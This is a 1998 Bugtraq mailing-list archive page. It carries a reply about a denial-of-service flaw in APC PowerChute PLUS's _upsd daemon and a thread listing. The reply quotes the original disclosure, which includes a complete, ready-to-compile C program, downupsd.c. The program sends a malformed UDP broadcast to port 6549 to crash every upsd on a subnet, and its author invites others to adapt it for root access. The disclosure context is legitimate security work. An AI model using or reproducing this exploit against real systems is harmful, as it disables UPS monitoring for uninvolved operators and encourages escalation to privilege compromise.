Bugtraq mailing list archives
Re: APC UPS PowerChute PLUS exploit...
From: rap () UCLINK BERKELEY EDU (Richard Peters)
Date: Mon, 13 Apr 1998 00:15:28 -0700
You don't need a specific exploit program to crash PowerChute software. Some port-scanners will crash it. We contacted PowerChute several months ago. Here's what the person who contacted them reported. I talked with the unix group at APC (the vendor for the UPS) about the problem of the ups daemon (_upsd) dying when another process such as a port scanner accessing the port thru which it runs. I filed trouble report #792505. They said this result is expected of the ups daemon not only on unix systems but also other operating systems such as NT. No work-around is being resolved by them unless enough customers complained. The only solution for us is to develop a script to monitor ... ..Richard Peters At 11:13 PM -0400 4/10/98, Theo Schlossnagle wrote:
I run Solaris x86 (2.5, 2.5.1, 2.6). I have a APC Smart UPS 700 (Model shouldn't matter for the exploit). Exploit in PowerChute PLUS v4.2.2 The PowerChute PLUS software distributed with the UPSs provides a TCP/IP (UDP/IP) way to communicate with (for monitoring) UPS on the local subnet. It listens on port 6549 and listens for broadcast requests (UDP). So if you make as if you are actually requesting information, but send it the wrong packet... Well end of ./_upsd (the name of the daemon). I assume an exploit could be tailored to leverage root privileges. The REALLY BAD news is that ALL upsd's on the subnet are effected (UDP broadcast) I would wager that this is not only a problem on Solaris x86. If anyone finds this to work on other platforms I would love to know, also if someone tailors it to gain root or other interesting things, I would love to here about it. I spoke with APC (www.apcc.com) and they blew me off. Forwarded the issue to their techinical crew, but I never heard word again. Here goes: ----- begin downupsd.c ----- #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> int main(int argc, char **argv) { int s; long on=1; size_t addrsize; char buffer[256]; struct sockaddr_in toaddr, fromaddr; struct hostent h_ent; if(argc!=2) { fprintf(stderr, "Usage:\n\t%s <hostname running upsd>\n", argv[0]); exit(0); } s = socket(AF_INET,SOCK_DGRAM,0); setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)); printf("Crashing upsd on host's subnet: %s\n", argv[1]); toaddr.sin_family = AF_INET; toaddr.sin_port = htons(0); toaddr.sin_addr.s_addr = 0x00000000; bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in)); toaddr.sin_port = htons(6549); memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent)); memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr)); toaddr.sin_addr.s_addr |= 0xff000000; strcpy(buffer, "027|1|public|9|0|0|2010~|0\0"); sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in)); printf("Crashed...\n"); close(s); } ------- end downupsd.c ----- Theo Schlossnagle jesus () cs jhu edu That jesus guy
Current thread:
- APC UPS PowerChute PLUS exploit... Theo Schlossnagle (Apr 10)
- MGE UPS Systems Ryan Murray (Apr 12)
- Re: MGE UPS Systems Theo de Raadt (Apr 13)
- DNS Tunnel - through bastion hosts Oskar Pearson (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Richard Peters (Apr 13)
- GSM SIMs cloned ! Rop Gonggrijp (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Pascal Gienger (Apr 13)
- (follow-up) Wietse's RPCBIND Chiaki Ishikawa (Apr 13)
- <Possible follow-ups>
- Re: APC UPS PowerChute PLUS exploit... Chris Liljenstolpe - Network Engineer (Apr 12)
- Re: APC UPS PowerChute PLUS exploit... Iain P.C. Moffat (Apr 13)
- IRIX LicenseManager(1M) Vulnerabilities SGI Security Coordinator (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Rick Perry (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Pascal Gienger (Apr 14)
- Re: APC UPS PowerChute PLUS exploit... Scott Stone (Apr 14)
- New possible exploit for 2.0.33 (kfree_skb error) Paul (Apr 15)
(Thread continues...)
- MGE UPS Systems Ryan Murray (Apr 12)